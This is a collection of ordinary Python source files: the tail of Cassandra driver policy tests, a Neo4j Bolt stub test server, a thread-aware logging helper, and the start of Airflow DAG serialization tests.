new_remote_host.set_location_info("dc9000", "rack1")
policy.on_add(new_remote_host)
# we now have two local hosts and two remote hosts in separate dcs
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))
# since we have hosts in dc9000, the distance shouldn't be IGNORED
self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)
policy.on_down(new_local_host)
policy.on_down(hosts[1])
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))
policy.on_down(new_remote_host)
policy.on_down(hosts[3])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
class ConvictionPolicyTest(unittest.TestCase):
def test_not_implemented(self):
"""
Code coverage for interface-style base class
"""
conviction_policy = ConvictionPolicy(1)
self.assertRaises(NotImplementedError, conviction_policy.add_failure, 1)
self.assertRaises(NotImplementedError, conviction_policy.reset)
class SimpleConvictionPolicyTest(unittest.TestCase):
def test_basic_responses(self):
"""
Code coverage for SimpleConvictionPolicy
"""
conviction_policy = SimpleConvictionPolicy(1)
self.assertEqual(conviction_policy.add_failure(1), True)
self.assertEqual(conviction_policy.reset(), None)
class ReconnectionPolicyTest(unittest.TestCase):
def test_basic_responses(self):
"""
Code coverage for interface-style base class
"""
policy = ReconnectionPolicy()
self.assertRaises(NotImplementedError, policy.new_schedule)
class ConstantReconnectionPolicyTest(unittest.TestCase):
def test_bad_vals(self):
"""
Test initialization values
"""
self.assertRaises(ValueError, ConstantReconnectionPolicy, -1, 0)
def test_schedule(self):
"""
Test ConstantReconnectionPolicy schedule
"""
delay = 2
max_attempts = 100
policy = ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
schedule = list(policy.new_schedule())
self.assertEqual(len(schedule), max_attempts)
for i, delay in enumerate(schedule):
self.assertEqual(delay, delay)
def test_schedule_negative_max_attempts(self):
"""
Test how negative max_attempts are handled
"""
delay = 2
max_attempts = -100
try:
ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
self.fail('max_attempts should throw ValueError when negative')
except ValueError:
pass
class ExponentialReconnectionPolicyTest(unittest.TestCase):
def test_bad_vals(self):
self.assertRaises(ValueError, ExponentialReconnectionPolicy, -1, 0)
self.assertRaises(ValueError, ExponentialReconnectionPolicy, 0, -1)
self.assertRaises(ValueError, ExponentialReconnectionPolicy, 9000, 1)
def test_schedule(self):
policy = ExponentialReconnectionPolicy(base_delay=2, max_delay=100)
schedule = list(policy.new_schedule())
self.assertEqual(len(schedule), 64)
for i, delay in enumerate(schedule):
if i == 0:
self.assertEqual(delay, 2)
elif i < 6:
self.assertEqual(delay, schedule[i - 1] * 2)
else:
self.assertEqual(delay, 100)
ONE = ConsistencyLevel.ONE
class RetryPolicyTest(unittest.TestCase):
def test_read_timeout(self):
policy = RetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=1, received_responses=2,
data_retrieved=True, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we didn't get enough responses, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=1,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we got enough responses, but also got a data response, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# we got enough responses but no data response, so retry
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=False, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
def test_write_timeout(self):
policy = RetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if it's not a BATCH_LOG write, don't retry it
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# retry BATCH_LOG writes regardless of received responses
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
required_responses=10000, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
def test_unavailable(self):
"""
Use the same tests for test_write_timeout, but ensure they only RETHROW
"""
policy = RetryPolicy()
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=10000, alive_replicas=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
class FallthroughRetryPolicyTest(unittest.TestCase):
"""
Use the same tests for test_write_timeout, but ensure they only RETHROW
"""
def test_read_timeout(self):
policy = FallthroughRetryPolicy()
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=1, received_responses=2,
data_retrieved=True, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=1,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=False, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_write_timeout(self):
policy = FallthroughRetryPolicy()
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
required_responses=10000, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_unavailable(self):
policy = FallthroughRetryPolicy()
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=10000, alive_replicas=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
class DowngradingConsistencyRetryPolicyTest(unittest.TestCase):
def test_read_timeout(self):
policy = DowngradingConsistencyRetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=1, received_responses=2,
data_retrieved=True, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we didn't get enough responses, retry at a lower consistency
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=4, received_responses=3,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.THREE)
# if we didn't get enough responses, retry at a lower consistency
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.TWO)
# retry consistency level goes down based on the # of recv'd responses
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=1,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.ONE)
# if we got no responses, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=0,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we got enough response but no data, retry
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=3,
data_retrieved=False, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
# if we got enough responses, but also got a data response, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_write_timeout(self):
policy = DowngradingConsistencyRetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# ignore failures on these types of writes
for write_type in (WriteType.SIMPLE, WriteType.BATCH, WriteType.COUNTER):
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=write_type,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.IGNORE)
# downgrade consistency level on unlogged batch writes
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.UNLOGGED_BATCH,
required_responses=3, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.ONE)
# retry batch log writes at the same consistency level
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
required_responses=3, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
# timeout on an unknown write_type
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=None,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_unavailable(self):
policy = DowngradingConsistencyRetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# downgrade consistency on unavailable exceptions
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.ONE)
|
stub.py | #!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2002-2019 "Neo Technology,"
# Network Engine for Objects in Lund AB [http://neotechnology.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from asyncio import new_event_loop, start_server, sleep, CancelledError, ensure_future, \
set_event_loop
from logging import getLogger
from threading import Event, Thread
from boltkit.addressing import Address
from boltkit.packstream import PackStream
from boltkit.server.scripting import ServerExit, ScriptMismatch, BoltScript, \
ClientMessageLine
log = getLogger("boltkit")
class BoltStubService:
default_base_port = 17687
default_timeout = 30
thread = None
auth = ("neo4j", "")
@classmethod
def load(cls, *script_filenames, **kwargs):
return cls(*map(BoltScript.load, script_filenames), **kwargs)
def __init__(self, *scripts, listen_addr=None, exit_on_disconnect=True, timeout=None):
if listen_addr:
listen_addr = Address(listen_addr)
else:
listen_addr = Address(("localhost", self.default_base_port))
self.exit_on_disconnect = exit_on_disconnect
self.timeout = timeout or self.default_timeout
self.loop = None
self.sleeper = None
self.host = listen_addr.host
self.next_free_port = listen_addr.port_number
self.scripts = {}
for script in scripts:
if script.port:
address = Address((listen_addr.host, script.port))
else:
address = Address((listen_addr.host, self.next_free_port))
self.next_free_port += 1
self.scripts[address.port_number] = script
self.servers = {}
self.started = Event()
self._exception = None
async def __aenter__(self):
self.start()
await self.wait_started()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
self.stop()
await self.wait_stopped()
@property
def addresses(self):
return sorted(Address((self.host, port)) for port in self.scripts)
@property
def primary_address(self):
return self.addresses[0]
def start(self):
if self.thread and self.thread.is_alive():
raise RuntimeError("Already running")
self.thread = Thread(target=self._run, daemon=True)
self.thread.start()
def stop(self):
if self.loop and self.sleeper:
self.loop.call_soon_threadsafe(self.sleeper.cancel)
self.sleeper = None
async def wait_started(self):
if self.thread and self.thread.is_alive():
self.started.wait()
async def wait_stopped(self):
if self.thread and self.thread.is_alive():
self.thread.join()
if self._exception:
raise self._exception
async def _start_servers(self):
self.servers.clear()
for port_number, script in self.scripts.items():
address = Address((self.host, port_number))
server = await start_server(self._handshake, host=self.host, port=port_number)
log.debug("[#%04X] S: <LISTEN> %s (%s)", port_number, address, script.filename)
self.servers[port_number] = server
self.started.set()
async def _stop_servers(self):
for server in self.servers.values():
server.close()
await server.wait_closed()
def _run(self):
self.loop = new_event_loop()
self.loop.set_debug(True)
set_event_loop(self.loop)
try:
self.loop.run_until_complete(self._a_run())
except Exception as e:
self._exception = e
raise
finally:
self.loop.stop()
self.loop.close()
self.loop = None
async def _a_run(self):
try:
await self._start_servers()
self.sleeper = ensure_future(sleep(self.timeout))
await self.sleeper
except CancelledError:
pass
else:
raise TimeoutError("Timed out after {!r}s".format(self.timeout))
finally:
await self._stop_servers()
async def _handshake(self, reader, writer):
client_address = Address(writer.transport.get_extra_info("peername"))
server_address = Address(writer.transport.get_extra_info("sockname"))
script = self.scripts[server_address.port_number]
log.debug("[#%04X] S: <ACCEPT> %s -> %s", server_address.port_number,
client_address, server_address)
try:
request = await reader.readexactly(20)
log.debug("[#%04X] C: <HANDSHAKE> %r", server_address.port_number, request)
response = script.on_handshake(request)
log.debug("[#%04X] S: <HANDSHAKE> %r", server_address.port_number, response)
writer.write(response)
await writer.drain()
actor = BoltActor(script, reader, writer)
await actor.play()
except ServerExit:
pass
except Exception as e:
self._exception = e
finally:
log.debug("[#%04X] S: <HANGUP>", server_address.port_number)
try:
writer.write_eof()
except OSError:
pass
await self._on_disconnect(server_address.port_number)
async def _on_disconnect(self, port):
if self.exit_on_disconnect:
server = self.servers[port]
server.close()
await server.wait_closed()
del self.servers[port]
if not self.servers:
self.stop()
class BoltActor:
def __init__(self, script, reader, writer):
self.script = script
self.reader = reader
self.writer = writer
self.stream = PackStream(reader, writer)
@property
def server_address(self):
return Address(self.writer.transport.get_extra_info("sockname"))
async def play(self):
try:
for line in self.script:
try:
await line.action(self)
except ScriptMismatch as error:
# Attach context information and re-raise
error.script = self.script
error.line_no = line.line_no
raise
await ClientMessageLine.default_action(self)
except (ConnectionError, OSError):
# It's likely the client has gone away, so we can
# safely drop out and silence the error. There's no
# point in flagging a broken client from a test helper.
return
def log(self, text, *args):
log.debug("[#%04X] " + text, self.server_address.port_number, *args)
def log_error(self, text, *args):
log.error("[#%04X] " + text, self.server_address.port_number, *args)
|
loggerbythread.py | # -*- coding: utf-8 -*-
import logging
import logging.handlers
import sys
import threading
import os
__author__ = 'Ares Ou (aresowj@gmail.com)'
# public logging levels
LOG_LEVEL_NOTSET = logging.NOTSET
LOG_LEVEL_DEBUG = logging.DEBUG
LOG_LEVEL_INFO = logging.INFO
LOG_LEVEL_WARNING = logging.WARNING
LOG_LEVEL_ERROR = logging.ERROR
# logger target
LOG_TARGET_CONSOLE = 0x1
LOG_TARGET_LOG_FILE = 0x10
LOG_TARGET_LOG_HTTP = 0x100
# _LOGGER_FORMAT = "[%(levelname)7s] [%(asctime)s] [%(thread)d] [%(module)s] - %(message)s"
_LOGGER_FORMAT = "[%(levelname)7s][%(asctime)s]- %(message)s"
class InfoOrLessCritical(logging.Filter):
def filter(self, record):
return record.levelno < LOG_LEVEL_WARNING
class HandlerFactory(object):
handlers = {}
@classmethod
def get_std_out_handler(cls):
if 'std_out_handler' not in cls.handlers:
std_out_handler = logging.StreamHandler(sys.stdout)
std_out_handler.setFormatter(logging.Formatter(_LOGGER_FORMAT))
std_out_handler.addFilter(InfoOrLessCritical())
cls.handlers['std_out_handler'] = std_out_handler
return cls.handlers['std_out_handler']
@classmethod
def get_std_err_handler(cls):
if 'std_err_handler' not in cls.handlers:
std_err_handler = logging.StreamHandler(sys.stderr)
std_err_handler.setFormatter(logging.Formatter(_LOGGER_FORMAT))
std_err_handler.setLevel(LOG_LEVEL_WARNING)
cls.handlers['std_err_handler'] = std_err_handler
return cls.handlers['std_err_handler']
@classmethod
def get_rotating_file_handler(cls, log_path, max_bytes, backup_count):
if 'rotating_file_handler' not in cls.handlers:
cls.handlers['rotating_file_handler'] = {}
if log_path not in cls.handlers['rotating_file_handler']:
rotating_file_handler = logging.handlers.RotatingFileHandler(
log_path, 'a', max_bytes, backup_count)
rotating_file_handler.setFormatter(logging.Formatter(_LOGGER_FORMAT))
cls.handlers['rotating_file_handler'][log_path] = rotating_file_handler
return cls.handlers['rotating_file_handler'][log_path]
# logger for this module
logger = logging.getLogger(__name__)
def singleton(cls, *args, **kw):
instances = {}
def _singleton():
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return _singleton
@singleton
class GeneralLogger(object):
def __init__(self, level=LOG_LEVEL_DEBUG, log_by_thread=False, log_path='', max_bytes=0, backup_count=0):
# set root logger
logging.getLogger().setLevel(LOG_LEVEL_NOTSET)
logging.getLogger().addHandler(HandlerFactory.get_std_out_handler())
logging.getLogger().addHandler(HandlerFactory.get_std_err_handler())
# default logger setting
logger.info("General logger initializing...")
self._loggers = {}
self._log_level = level
self._main_thread_id = str(self.get_current_thread_id())
self._log_destination = LOG_TARGET_CONSOLE
self._log_by_thread = log_by_thread
self._log_path = log_path
self._log_file_max_bytes = max_bytes
self._log_file_backup_count = backup_count
@staticmethod
def get_current_thread_id():
return threading.current_thread().ident
@staticmethod
def get_current_thread_name():
return threading.current_thread().name
def get_log_file_name(self):
log_path = os.path.abspath(self._log_path) #返回绝对路径带盘符 d:\tmp\test.txt
base_name = os.path.basename(log_path) #返回文件名 test.txt
base_dir = os.path.dirname(log_path) #返回文件路径 d:\tmp
# print("路径是:", log_path,base_name,base_dir)
if self._log_by_thread:
# base_name = '%d_%s_%s' % (self.get_current_thread_id(), self.get_current_thread_name(), base_name) #取消在文件名中显示线程ID和线程名
# base_name =
pass
if os.path.isdir(log_path):
# only folder path provided, create a name for the log file
return os.path.join(log_path, base_name)
elif base_name and '.' not in base_name:
# path is like '/tmp/a' and folder should be created
os.makedirs(log_path)
return os.path.join(log_path, base_name)
else:
return os.path.join(base_dir, base_name)
def get_logger(self):
name = self._main_thread_id
if self._log_by_thread:
current_id = str(self.get_current_thread_id())
if current_id != self._main_thread_id:
# set loggers of sub threads as children of main logger
# so that logs from sub thread will be processed by
# main logger. Otherwise, main logs will not contain sub logs.
name = self._main_thread_id + '.' + current_id
if name not in self._loggers:
self.set_logger(name)
return self._loggers[name]
def set_logger(self, name):
if name not in self._loggers:
new_logger = logging.getLogger(name)
new_logger.setLevel(self._log_level)
if self._log_path:
# log path will vary if log by thread is enabled
log_path = self.get_log_file_name()
new_logger.addHandler(HandlerFactory.get_rotating_file_handler(
log_path, self._log_file_max_bytes, self._log_file_backup_count))
self._loggers[name] = new_logger
def set_log_path(self, file_path, max_bytes=0, backup_count=0):
if isinstance(file_path, str):
self._log_path = file_path
if isinstance(max_bytes, int):
self._log_file_max_bytes = max_bytes
if isinstance(backup_count, int):
self._log_file_backup_count = backup_count
def set_log_level(self, new_level):
self._log_level = new_level
for instanceLogger in self._loggers.values():
instanceLogger.setLevel(self._log_level)
def set_log_by_thread_log(self, log_by_thread):
self._log_by_thread = log_by_thread
# if thread log is enabled, only enable the main logger
for instanceLogger in self._loggers.values():
instanceLogger.disabled = not self._log_by_thread
try:
self._loggers[self._main_thread_id].disabled = self._log_by_thread
except KeyError:
pass
class LogPostProcess():
def log_joint_and_decode(self, threadid, waiting_to_send, logdata, encodingtype):
"""
数据处理后存入log,将有找到\r\n或者\r\r\n的进行回车处理,分行显示
Args
residue_data:传入上一次处理剩余的数据
logdata:待处理的log数据
Return
waited_send_and_residue_data:等待发送和剩余数据
datalist:处理后的log数据列表
residue_data:处理后剩余的数据
"""
print("处理中是:",threadid,waiting_to_send)
data = waiting_to_send[threadid]["residue"] + logdata.decode(encodingtype)
# waiting_to_send = residue_data_dict
waiting_to_send[threadid]["senddata"] =[]
new_data=''
i=0
for x in data:
if x=='\r':
# print(r"找到\r")
i+=1
# if i==2:
# print(i)
continue
elif x=='\n' and (i > 0):
# print(r"找到\n") #只有找到\r\n或者\r\r\n才能进行打印操作,否则
waiting_to_send[threadid]["senddata"].append(new_data)
i=0
new_data=""
continue
else:
i=0
new_data+=x
if new_data != "":
waiting_to_send[threadid]["residue"] += new_data
return waiting_to_send
if __name__ == '__main__':
def worker1(message):
GeneralLogger().set_log_path('/tmp/thread1/test.txt')
worker_logger = GeneralLogger().get_logger()
worker_logger.info(message + ' info')
worker_logger.debug(message + ' debug')
worker_logger.warning(message + ' warning')
worker_logger.error(message + ' error')
def worker2(message):
GeneralLogger().set_log_path('/tmp/thread2/test.txt')
worker_logger = GeneralLogger().get_logger()
worker_logger.info(message + ' info')
worker_logger.debug(message + ' debug')
worker_logger.warning(message + ' warning')
worker_logger.error(message + ' error')
GeneralLogger().set_log_path('/tmp/test.txt')
GeneralLogger().set_log_by_thread_log(True)
GeneralLogger().set_log_level(LOG_LEVEL_DEBUG)
main_logger = GeneralLogger().get_logger()
main_logger.debug('debug')
main_logger.warning('warning')
main_logger.info('info')
main_logger.error('error')
t1 = threading.Thread(target=worker1, args=('worker 1',))
t2 = threading.Thread(target=worker2, args=('worker 2',))
t1.start()
t2.start() |
test_dag_serialization.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import copy
import importlib
import importlib.util
import multiprocessing
import os
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from airflow.exceptions import SerializationError
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.models.param import Param, ParamsDict
from airflow.models.xcom import XCom
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import CustomSerializationTimetable, cron_timetable, delta_timetable
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_ext": ['.sh', '.bash'],
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_ext": [],
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"schedule_interval": {"__type": "timedelta", "__var": 86400.0},
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
"params": {},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
CUSTOM_TIMETABLE_SERIALIZED = {
"__type": "tests.test_utils.timetables.CustomSerializationTimetable",
"__var": {"value": "foo"},
}
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def get_timetable_based_simple_dag(timetable):
"""Create a simple_dag variant that uses timetable instead of schedule_interval."""
dag = collect_dags(["airflow/example_dags"])["simple_dag"]
dag.timetable = timetable
dag.schedule_interval = timetable.summary
return dag
